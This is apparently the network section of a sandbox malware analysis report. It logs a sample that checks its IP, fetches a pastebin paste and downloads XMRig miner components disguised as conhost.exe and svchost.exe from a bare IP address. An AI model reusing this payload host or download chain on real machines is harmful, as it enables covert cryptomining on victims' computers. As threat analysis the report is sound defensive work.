Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
pastebin.com | 104.20.68.143 | |
api.ip.sb | 104.26.12.31 | |
GET 200 https://api.ip.sb/ip
Request:
GET /ip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Mon, 11 Dec 2023 10:27:30 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
Cache-Control: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XCv9CArEMBv%2F%2FqBGAcyp%2BvkwaArK%2Bqii4zCJG9wPlbWQFGynFBwrY3Fyb4bgbaidDrFmLf2OMaAlsClXxaw5Pl1y5wMecvQVtlWeiW5vE4Jo7TUGy%2FzCxi1a6g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 833d090f1a9f29d1-FUK
alt-svc: h3=":443"; ma=86400
GET 200 https://pastebin.com/raw/ZRRRiwsq
Request:
GET /raw/ZRRRiwsq HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Mon, 11 Dec 2023 10:28:11 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: MISS
Last-Modified: Mon, 11 Dec 2023 10:28:11 GMT
Server: cloudflare
CF-RAY: 833d0a0d79307c89-LAX
GET 200 http://195.20.16.153/conhost.exe
Request:
GET /conhost.exe HTTP/1.1
Host: 195.20.16.153
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 10:27:55 GMT
Content-Type: application/octet-stream
Content-Length: 2679368
Last-Modified: Wed, 06 Dec 2023 15:37:40 GMT
Connection: keep-alive
ETag: "65709544-28e248"
Accept-Ranges: bytes
GET 200 http://195.20.16.153/svchost.exe
Request:
GET /svchost.exe HTTP/1.1
Host: 195.20.16.153
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 10:27:58 GMT
Content-Type: application/octet-stream
Content-Length: 329728
Last-Modified: Wed, 15 Nov 2023 13:39:56 GMT
Connection: keep-alive
ETag: "6554ca2c-50800"
Accept-Ranges: bytes
GET 200 http://195.20.16.153/xmrig.exe
Request:
GET /xmrig.exe HTTP/1.1
Host: 195.20.16.153
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 10:28:11 GMT
Content-Type: application/octet-stream
Content-Length: 3026944
Last-Modified: Sat, 02 Dec 2023 16:31:45 GMT
Connection: keep-alive
ETag: "656b5bf1-2e3000"
Accept-Ranges: bytes
GET 200 http://195.20.16.153/WinRing0x64.sys
Request:
GET /WinRing0x64.sys HTTP/1.1
Host: 195.20.16.153
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 10:28:11 GMT
Content-Type: application/octet-stream
Content-Length: 14544
Last-Modified: Tue, 14 Nov 2023 16:09:50 GMT
Connection: keep-alive
ETag: "65539bce-38d0"
Accept-Ranges: bytes
GET 200 http://195.20.16.153/WatchDog.exe
Request:
GET /WatchDog.exe HTTP/1.1
Host: 195.20.16.153
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 10:28:25 GMT
Content-Type: application/octet-stream
Content-Length: 63488
Last-Modified: Tue, 14 Nov 2023 16:09:49 GMT
Connection: keep-alive
ETag: "65539bcd-f800"
Accept-Ranges: bytes
ICMP traffic
No ICMP traffic performed.
IRC traffic
Command | Params | Type |
---|---|---|
MODE | proxy mode, nicehash (default) or simple | client |
Suricata Alerts
No Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49166 104.26.13.31:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 53:56:0b:3a:91:49:7f:18:59:87:21:98:d3:7f:98:0b:b4:ae:cb:cc |
TLS 1.2 192.168.56.103:49200 104.20.67.143:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 55:c8:82:61:30:05:42:80:db:47:5e:d0:66:b5:df:ac:14:5b:19:6f |
Snort Alerts
No Snort Alerts